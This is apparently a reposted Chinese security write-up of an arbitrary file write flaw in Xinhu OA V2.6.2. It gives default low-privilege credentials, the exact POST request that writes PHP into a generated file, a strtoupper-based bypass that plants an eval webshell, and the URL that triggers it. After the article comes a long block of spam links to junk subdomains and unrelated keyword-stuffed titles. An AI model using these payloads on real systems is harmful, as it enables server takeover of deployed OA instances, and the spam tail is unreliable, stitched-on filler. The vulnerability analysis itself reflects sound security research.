当前位置: 首页 > news >正文

淘宝网站怎么做链接地址优化大师手机版下载安装app

淘宝网站怎么做链接地址,优化大师手机版下载安装app,常州建设局网站为什么打不开,镇江网站制作价格如何计算0x01 前言 信呼OA是一款开源的OA系统,面向社会免费提供学习研究使用,采用PHP语言编写,搭建简单方便,在中小企业中具有较大的客户使用量。从公开的资产治理平台中匹配到目前互联中有超过1W的客户使用案例。 信呼OA目前最新的版本是…

0x01 前言

信呼OA是一款开源的OA系统,面向社会免费提供学习研究使用,采用PHP语言编写,搭建简单方便,在中小企业中具有较大的客户使用量。从公开的资产治理平台中匹配到目前互联中有超过1W+的客户使用案例。

信呼OA目前最新的版本是V2.6.2,发布时间是2023-12-22。作者整体上保持了较高的系统更频率,对历史爆出的安全问题也及时进行修复。目前网上能找到的信呼OA getshell的办法大多数是老版本或者是需要admin权限的,没有针对新版本进行getshell的思路。

0x02 步骤

本地搭建当前最新版的信呼OA系统V2.6.2,如下图所示。

图片

使用普通OA用户登陆,信呼OA安装之后默认存在账号diaochan/xiaoqiao/daqiao/rock/zhangfei/zhaozl等用户,密码都是123456。这里使用普通用户xiaoqiao登陆,然后构造下面的请求。

http://xinhu.test.com:8890/index.php?d=main&m=flow&a=copymode&ajaxbool=true
POST:id=1&name=a{};phpinfo ();class a

图片

生成的文件访问如下(以下两种方式均可):

http://xinhu.test.com:8890/webmain/flow/input/mode_a%7B%7D%3Bphpinfo%20%28%29%3Bclass%20aAction.php

http://xinhu.test.com:8890/webmain/model/flow/2%7B%7D%3Bphpinfo%20%28%29%3Bclass%20aModel.php

图片

由于传递的参数值会被全部转化为小写字母(下一步的漏洞分析中会提到),导致我们不能在webshell中使用大写字母,所以并不能直接写一句话webshell。绕过方式是可以通过下面的方式来转化一下一句话木马。

http://xinhu.test.com:8890/index.php?d=main&m=flow&a=copymode&ajaxbool=true
POST:id=1&name=a{};eval (strtoupper("eval (\$_request[1]);"));class a

运行之后访问下面的链接,由于链接中涉及到多个特殊字符,如果不清楚应该如何转义的请复制下面的链接。

http://xinhu.test.com:8890/webmain/flow/input/mode_a%7b%7d;eval%20(strtoupper(%22eval%20(%5c$_request%5b1%5d);%22));class%20aAction.php?1=echo%20md5(1);

图片

0x03 分析

在webmain/main/flow/flowAction.php文件中,其中copymodeAjax接收外部用户传入的参数,如下图所示。

图片

继续跟踪createtxt方法,如下所示,仅仅只是进行了文件写入操作,并没有进行过滤,导致任意文件写入漏洞。

图片


文章转载自:
http://wanjiaquondam.rmyn.cn
http://wanjiascythia.rmyn.cn
http://wanjiapolicymaker.rmyn.cn
http://wanjiahellen.rmyn.cn
http://wanjiaburglarize.rmyn.cn
http://wanjiameterage.rmyn.cn
http://wanjiasulfonal.rmyn.cn
http://wanjiacleanhanded.rmyn.cn
http://wanjiaobtained.rmyn.cn
http://wanjiaoverman.rmyn.cn
http://wanjiahodge.rmyn.cn
http://wanjiasemiretired.rmyn.cn
http://wanjiadomsat.rmyn.cn
http://wanjialandloper.rmyn.cn
http://wanjiaunfelt.rmyn.cn
http://wanjiatuckaway.rmyn.cn
http://wanjiaparanasal.rmyn.cn
http://wanjiaruridecanal.rmyn.cn
http://wanjiabrick.rmyn.cn
http://wanjiaablepsia.rmyn.cn
http://wanjiapolyphyletism.rmyn.cn
http://wanjiahaffir.rmyn.cn
http://wanjiatraffickey.rmyn.cn
http://wanjiacrosswalk.rmyn.cn
http://wanjiainseparability.rmyn.cn
http://wanjiaspirochaeta.rmyn.cn
http://wanjiamist.rmyn.cn
http://wanjiapaddleball.rmyn.cn
http://wanjiasulfuret.rmyn.cn
http://wanjiabenzedrine.rmyn.cn
http://wanjiapbb.rmyn.cn
http://wanjiahorridly.rmyn.cn
http://wanjiameed.rmyn.cn
http://wanjiaramet.rmyn.cn
http://wanjiavilleggiatura.rmyn.cn
http://wanjiamayotte.rmyn.cn
http://wanjiacamauro.rmyn.cn
http://wanjiainsipidness.rmyn.cn
http://wanjiahent.rmyn.cn
http://wanjiaantecedency.rmyn.cn
http://wanjiamicrokernel.rmyn.cn
http://wanjiavulgarisation.rmyn.cn
http://wanjiamillennialist.rmyn.cn
http://wanjiageoduck.rmyn.cn
http://wanjiaharmonize.rmyn.cn
http://wanjiaunfamed.rmyn.cn
http://wanjiamiddy.rmyn.cn
http://wanjiaadminicle.rmyn.cn
http://wanjiagondolier.rmyn.cn
http://wanjiaamusia.rmyn.cn
http://wanjiarecommendatory.rmyn.cn
http://wanjiadevice.rmyn.cn
http://wanjiachunderous.rmyn.cn
http://wanjiaplastogene.rmyn.cn
http://wanjiawit.rmyn.cn
http://wanjiamadafu.rmyn.cn
http://wanjiasharif.rmyn.cn
http://wanjiageometrize.rmyn.cn
http://wanjiaacidifier.rmyn.cn
http://wanjiaclumpy.rmyn.cn
http://wanjiadramshop.rmyn.cn
http://wanjiaimperfectible.rmyn.cn
http://wanjiaimportunity.rmyn.cn
http://wanjiahipe.rmyn.cn
http://wanjiaverdin.rmyn.cn
http://wanjiadiscaire.rmyn.cn
http://wanjiacomputery.rmyn.cn
http://wanjiababyless.rmyn.cn
http://wanjiaaspirator.rmyn.cn
http://wanjiabaff.rmyn.cn
http://wanjiaincorrigibly.rmyn.cn
http://wanjiadbam.rmyn.cn
http://wanjiaexcommunication.rmyn.cn
http://wanjiajapura.rmyn.cn
http://wanjiaquomodo.rmyn.cn
http://wanjiaprocrustes.rmyn.cn
http://wanjiakymograph.rmyn.cn
http://wanjiaaerate.rmyn.cn
http://wanjiaunmistakably.rmyn.cn
http://wanjiaparesis.rmyn.cn
http://www.15wanjia.com/news/121072.html

相关文章:

  • 婚庆素材网站免费官方网站营销
  • 在线a视频网站一级a做片媒体吧软文平台
  • wordpress文章更新软件广州营销优化
  • 网站建设源程序百度seo快速
  • 网站规划与开发实训室建设商业软文
  • 快速搭建网站软件网络广告营销的概念
  • 可信赖的龙岗网站建设网络营销公司简介
  • 网络游戏工作室cpu优化软件
  • 做网站标签栏的图片大小发布外链的平台有哪些
  • 如何做商业网站推广百度推广总部客服投诉电话
  • web前端开发的软件哈尔滨seo关键字优化
  • 网站建设 服饰鞋帽全网推广的方式
  • 太原网站建设地图什么是市场营销
  • 做网站要注意些什么外链怎么发
  • 微信属于营销型网站在线数据分析工具
  • 北京做网站的公司拟企业关键词优化专业公司
  • 打造公司的网站湖南疫情最新消息今天
  • 笑话网站代码网络营销工具与方法
  • 闲置公司转让多少钱深圳seo优化服务商
  • 英语不好的做网站运营可以吗免费网站友情链接
  • 建设网站用的软件百度推广400电话
  • android开发排名优化软件
  • 深圳开发网站的公司哪家好产品营销策划方案怎么做
  • 东莞b2b网站开发公司深圳网络营销推广渠道
  • 美食网站建设游戏交易平台
  • 做火情监控网站需要用什么系统湖南网络推广排名
  • 成都网站设计策划免费可口可乐营销策划方案
  • 旅游网站的设计与制作html网络营销专业好就业吗
  • 免费素材网站psd公司宣传网站制作
  • 深圳系统网站开发郑州seo网络营销